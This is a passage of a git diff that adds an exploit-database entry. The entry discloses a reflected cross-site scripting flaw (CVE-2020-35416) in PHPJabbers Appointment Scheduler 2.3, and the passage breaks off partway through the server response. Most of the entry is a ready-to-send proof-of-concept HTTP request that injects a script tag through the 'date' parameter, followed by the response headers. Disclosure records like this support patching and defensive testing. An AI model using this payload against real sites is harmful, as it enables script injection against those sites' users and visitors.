+on the View Employee Icon. This will tigger all Stored XSS payloads.
\ No newline at end of file
diff --git a/exploits/php/webapps/49281.txt b/exploits/php/webapps/49281.txt
new file mode 100644
index 000000000..17b345c98
--- /dev/null
+++ b/exploits/php/webapps/49281.txt
@@ -0,0 +1,52 @@
+# Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)
+# Date: 2020-12-14
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://www.phpjabbers.com
+# Software Link: https://www.phpjabbers.com/appointment-scheduler
+# Version: 2.3
+# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)
+# CVE: CVE-2020-35416
+
+Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.
+
+Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.
+
+PoC Request:
+GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1
+Host: [removed]
+Connection: close
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://[removed]
+Accept-Encoding: gzip, deflate
+Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422
+
+PoC Response:
+HTTP/1.1 200 OK
+Server: nginx
+Date: Thu, 14 Dec 2020 10:48:41 GMT
+Content-Type: text/html; charset=utf-8
+Connection: close
+Vary: Accept-Encoding
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+Access-Control-Allow-Methods: POST, GET, OPTIONS
+Access-Control-Allow-Headers: Origin, X-Requested-With 
+Content-Length: 13988 + +